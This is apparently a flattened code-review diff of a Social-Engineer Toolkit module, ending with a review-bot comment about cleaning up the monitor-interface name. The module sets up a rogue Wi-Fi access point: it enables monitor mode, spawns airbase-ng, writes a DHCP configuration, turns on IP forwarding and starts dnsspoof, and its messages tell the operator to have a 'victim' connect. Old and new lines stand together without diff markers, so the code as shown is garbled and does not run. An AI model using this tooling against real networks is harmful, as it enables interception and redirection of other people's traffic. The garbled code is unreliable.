fakeap_dhcp_menu_choice = input(setprompt(["8"], ""))
dhcptun = None
show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(core.setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = check_length(fakeap_dhcp_menu_choice, 2)
fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
if fakeap_dhcp_menu_choice == "":
else:
fakeap_dhcp_menu_choice = "1"
if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config1)
# close the file
filewrite.close()
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1)
dhcptun = 1
if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out
print_status("Writing the dhcp configuration file to ~/.set")
filewrite = open(setdir + "/dhcp.conf", "w")
filewrite.write(dhcp_config2)
# close the file
filewrite.close()
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config2)
dhcptun = 2
if fakeap_dhcp_menu_choice == "exit":
exit_set()
core.exit_set()
interface = input(
setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
interface = input(core.setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
# place wifi interface into monitor mode
print_status("Placing card in monitor mode via airmon-ng..")
core.print_status("Placing card in monitor mode via airmon-ng..")
# if we have it already installed then don't use the SET one
if os.path.isfile("/usr/local/sbin/airmon-ng"):
airmonng_path = "/usr/local/sbin/airmon-ng"
if not os.path.isfile("/usr/local/sbin/airmon-ng"):
else:
airmonng_path = "src/wireless/airmon-ng"
monproc = subprocess.Popen("%s start %s | grep \"monitor mode enabled on\" | cut -d\" \" -f5 | sed -e \'s/)$//\'" %
(airmonng_path, interface), shell=True, stdout=subprocess.PIPE)
monproc = subprocess.Popen("{0} start {1} |"
"grep \"monitor mode enabled on\" |"
"cut -d\" \" -f5 |"
"sed -e \'s/)$//\'".format(airmonng_path, interface),
shell=True, stdout=subprocess.PIPE)
moniface = monproc.stdout.read()
monproc.wait()
@ -134,47 +126,39 @@ monproc.wait()
subprocess.Popen("modprobe tun", shell=True).wait()
# create a fake access point
print_status("Spawning airbase-ng in a seperate child thread...")
child = pexpect.spawn('%s -P -C 20 -e "%s" -c %s %s' %
(airbase_path, access_point, ap_channel, moniface))
print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
core.print_status("Spawning airbase-ng in a separate child thread...")
child = pexpect.spawn('{0} -P -C 20 -e "{1}" -c {2} {3}'.format(airbase_path, access_point, ap_channel, moniface))
core.print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)
# bring the interface up
if dhcptun == 1:
print_status("Bringing up the access point interface...")
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen(
"ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen(
"route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
if dhcptun == 2:
print_status("Bringing up the access point interface...")
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen(
"ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen(
"route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
subprocess.Popen("route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
# starts a dhcp server
print_status("Starting the DHCP server on a seperate child thread...")
core.print_status("Starting the DHCP server on a separate child thread...")
child2 = pexpect.spawn("service isc-dhcp-server start")
# starts ip_forwarding
print_status("Starting IP Forwarding...")
core.print_status("Starting IP Forwarding...")
child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")
# start dnsspoof
print_status("Starting DNSSpoof in a seperate child thread...")
child4 = pexpect.spawn("%s -i at0" % (dnsspoof_path))
core.print_status("Starting DNSSpoof in a separate child thread...")
child4 = pexpect.spawn("{0} -i at0".format(dnsspoof_path))
print_status(
"SET has finished creating the attack. If you experienced issues please report them.")
print_status(
"Now launch SET attack vectors within the menus and have a victim connect via wireless.")
print_status(
"Be sure to come back to this menu to stop the services once your finished.")
return_continue()
core.print_status("SET has finished creating the attack. If you experienced issues please report them.")
core.print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
core.print_status("Be sure to come back to this menu to stop the services once your finished.")
core.return_continue()
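Review bot: `moniface` at L1491 is the raw pipe output and still carries the trailing newline from `sed`, and it is now interpolated straight into the airbase-ng command at L1501 (on Python 3 it would also be bytes and render as `b'...'`); `moniface = monproc.stdout.read().decode().strip()` before the spawn would pass a clean interface name. The read happens before `monproc.wait()` at L1492, which is the right order for a pipeline but not obvious, so a comment such as `# drain stdout before wait() so the pipeline cannot block on a full pipe` would help the next reader.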